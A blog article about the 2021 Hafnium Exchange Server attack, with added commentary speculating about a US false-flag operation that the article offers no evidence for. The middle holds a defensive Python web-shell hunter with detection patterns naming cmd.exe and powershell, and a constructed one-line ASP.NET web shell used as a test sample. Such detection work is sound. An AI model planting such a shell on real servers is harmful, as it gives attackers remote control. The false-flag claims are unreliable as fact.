A sophisticated attack on Microsoft’s ubiquitous email software is being laid at China’s feet. Many people are asking whether the attack was a Chinese hack, a false flag, or something else. Whatever it was, it is clear that the attack is now verging on a global crisis.
If you think a cyberattack is minor and wouldn’t affect you, check out this article on the Petya ransomware attack or this one on a Florida water supply. It’s actually shocking just how easily a massive cyberattack could happen to us, so you may want to take some steps to be prepared for the possibility of a cyberattack.
Now let’s talk about how bad this Exchange attack is. It may make you wonder whether cyber warfare is the battleground of the future.
The attack has claimed at least 60,000 victims, many of them small businesses
This attack, which exploits flaws in on-premises Microsoft Exchange Server, has become a global cybersecurity emergency, as hackers race to compromise as many organizations as possible before companies can secure their systems.
Microsoft attributes the attack to a Chinese government-backed hacking group. The European Banking Authority was also hit. The regulator announced Sunday that personal data held in emails on its Microsoft Exchange servers might well have been compromised. Other victims include banks, electricity providers, senior citizen homes, and the small businesses mentioned above. There are also reports that hospitals have been hit.
So it’s important to note that a cyberattack doesn’t just mess up a few computers – it can throw our entire modern way of life into utter chaos.
What is not being made clear is just what information the hackers have taken
These attacks come on the heels of the SolarWinds Corp. breaches that were blamed on Russian hackers. In the final days of the Exchange attack, whoever was behind it appears to have automated the process and thus picked up tens of thousands of new victims around the world in a matter of days.
Washington claims to be preparing its retaliation for SolarWinds. According to MSM “sources,” the US government is planning a series of covert actions against Russian networks as well as more economic sanctions against Russia, which is precisely what has so many people wondering whether the attacks were actually false flag operations.
Microsoft claims that it knows the identity of the Chinese hacking group: Hafnium
On March 2, 2021, Microsoft put out a statement on its website. In it, Microsoft says Hafnium appears to have been breaking into private and government networks through Exchange Server software, and has been doing so for several months.
The SolarWinds hack, allegedly Russian, breached nine federal agencies and at least 100 companies through “tampered updates” from SolarWinds LLC, an IT management software maker. The Exchange attack is thus the second cybersecurity crisis in a matter of months. Microsoft’s statement reads:
Today, we’re sharing information about a state-sponsored threat actor identified by the Microsoft Threat Intelligence Center (MSTIC) that we are calling Hafnium. Hafnium operates from China, and this is the first time we’re discussing its activity. It is a highly skilled and sophisticated actor.
Historically, Hafnium primarily targets entities in the United States for the purpose of exfiltrating information from a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs. While Hafnium is based in China, it conducts its operations primarily from leased virtual private servers (VPS) in the United States.
Recently, Hafnium has engaged in a number of attacks using previously unknown exploits targeting on-premises Exchange Server software. To date, Hafnium is the primary actor we’ve seen use these exploits, which are discussed in detail by MSTIC here. The attacks included three steps. First, it would gain access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would create what’s called a web shell to control the compromised server remotely. Third, it would use that remote access – run from the U.S.-based private servers – to steal data from an organization’s network.
Cybersecurity experts are now expressing a growing sense of exhaustion and frustration
China has denied having anything to do with the attack. A Chinese foreign ministry spokesman said the country “firmly opposes and combats cyber attacks and cyber theft in all forms” and said that blaming a specific nation was a “highly sensitive political issue.”
Both of these incidents show just how fragile modern networks are. They also show how sophisticated state-sponsored hackers are when they go looking for “hard-to-find vulnerabilities,” or even create them, to conduct espionage operations. Both were complex campaigns that began with a broad initial compromise of many computers and then narrowed as the attackers focused on the targets of interest. Both took the affected organizations weeks or months to resolve.
Applying the updates provided by Microsoft will not remove attackers who are already in the network
A review of affected systems is required, said Charles Carmakal of the cybersecurity firm Mandiant. The White House emphasized the same thing, including tweets from the National Security Council urging the growing list of victims to carefully comb through their computers for signs of the attackers. Initially, the Chinese hackers appeared to be targeting high-value intelligence targets in the U.S., said Steven Adair of the security firm Volexity. About a week ago, everything changed. Other unidentified hacking groups began hitting thousands of victims over a short period, inserting hidden software that could give them access later, he said.
“They went to town and started doing mass exploitation — indiscriminate attacks compromising exchange servers, literally around the world, with no regard to purpose or size or industry,” Adair said. “They were hitting any and every server that they could.”
Adair said that other hacking groups may have found the same flaws and begun their own attacks, or that China may have wanted to capture as many victims as possible, then sort out which had intelligence value.
Either way, the attacks were so successful — and so rapid — that the hackers appear to have found a way to automate the process. “If you are running an Exchange server, you most likely are a victim,” he said.
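Microsoft’s description above has the attackers dropping a web shell onto the Exchange server after the initial break-in, and the experts’ warning is that patching closes the door but leaves that shell in place, so the server itself has to be searched. The script below is an added example of what that search looks like; it is not Microsoft’s tooling and not code from the original article. It walks an Exchange web root looking for ASP.NET pages that carry code-execution markers, or that sit in a directory where a clean install ships no .aspx at all. The marker list, the “aspx-free” directory name and the two sample files are assumptions constructed for this example, not an official signature set.

```python
"""Hunt for ASP.NET web shells left behind on an Exchange web root.

Added example, not Microsoft's tooling. The regex markers, the
directory list and the sample files below are assumptions / constructed
test data, not an official indicator set.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field

# Content heuristics typical of one-line ASP.NET web shells (assumed markers).
SHELL_PATTERNS = {
    "eval_request": re.compile(r"eval\s*\(\s*Request", re.I),
    "unsafe_eval": re.compile(r"['\"]unsafe['\"]", re.I),
    "process_start": re.compile(r"Process\.Start|cmd\.exe|powershell(\.exe)?", re.I),
    "reflection_load": re.compile(r"Assembly\.Load|Activator\.CreateInstance", re.I),
}

# Top-level sub-directories of the web root where a legitimate install ships
# no .aspx pages, so any page found there is suspect (assumption for this example).
ASPX_FREE_DIRS = ("aspnet_client",)

SCRIPT_EXTENSIONS = (".aspx", ".ashx", ".asmx")


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)


def scan_file(path, webroot):
    """Return a Finding for one server-side page, or None if nothing looks wrong."""
    reasons = []
    rel = os.path.relpath(path, webroot)
    top = rel.split(os.sep)[0].lower()
    if top in ASPX_FREE_DIRS:
        reasons.append(f"page in unexpected directory {top!r}")
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            body = fh.read(256 * 1024)  # shells are tiny; cap the read anyway
    except OSError as exc:
        return Finding(path, [f"unreadable: {exc}"])
    for name, pattern in SHELL_PATTERNS.items():
        if pattern.search(body):
            reasons.append(f"content matches {name}")
    # A very small page that still hits an execution marker is the classic one-liner shell.
    if len(body) < 512 and any(r.startswith("content") for r in reasons):
        reasons.append("tiny file with execution marker")
    return Finding(path, reasons) if reasons else None


def hunt(webroot):
    """Walk the web root and collect every suspicious server-side page."""
    findings = []
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if name.lower().endswith(SCRIPT_EXTENSIONS):
                finding = scan_file(os.path.join(dirpath, name), webroot)
                if finding:
                    findings.append(finding)
    return findings


# Constructed sample web root: one benign logon page, one hostile page
# dropped into aspnet_client. Both files are made up for this example.
BENIGN_PAGE = '<%@ Page Language="C#" %>\n<html><body><form runat="server"></form></body></html>\n'
HOSTILE_PAGE = ('<script language="JScript" runat="server">'
                'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>')


def build_sample_webroot():
    root = tempfile.mkdtemp(prefix="exch-webroot-")
    os.makedirs(os.path.join(root, "owa", "auth"))
    os.makedirs(os.path.join(root, "aspnet_client"))
    with open(os.path.join(root, "owa", "auth", "logon.aspx"), "w") as fh:
        fh.write(BENIGN_PAGE)
    with open(os.path.join(root, "aspnet_client", "help.aspx"), "w") as fh:
        fh.write(HOSTILE_PAGE)
    return root


if __name__ == "__main__":
    sample_root = build_sample_webroot()
    for hit in hunt(sample_root):
        print(hit.path)
        for reason in hit.reasons:
            print("   -", reason)
```

Run against a real server, `hunt()` would be pointed at the IIS web root of the Exchange installation rather than the constructed sample, and each hit should be treated as a lead to be confirmed by hand (file timestamps, IIS request logs for that path), not as a verdict. The point of the example is the one the experts make above: the patch stops new break-ins, but only a review of the files already on disk tells you whether an attacker has kept a way back in.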
Is the future of warfare cyber warfare?
The United States government has every reason to stage a false flag cyberattack to justify more sanctions against Russia and future action against China. But we also have to be realistic. Both Russia and China have every reason to gather as much information on American governmental and economic assets as possible.
So we stand between two possibilities knowing that both can and will be exploited by world powers for their own agendas.
Are you concerned about the possibility of a cyberattack?
Are you doing anything to prepare for a possible cyberattack? What are some considerations you’ve thought of besides just your personal or business systems? Let’s talk about it in the comments.
Robert Wheeler has been quietly researching world events for two decades. After witnessing the global network of NGOs and several ‘Revolutions’ they engineered in a number of different countries, Wheeler began analyzing current events through these lenses.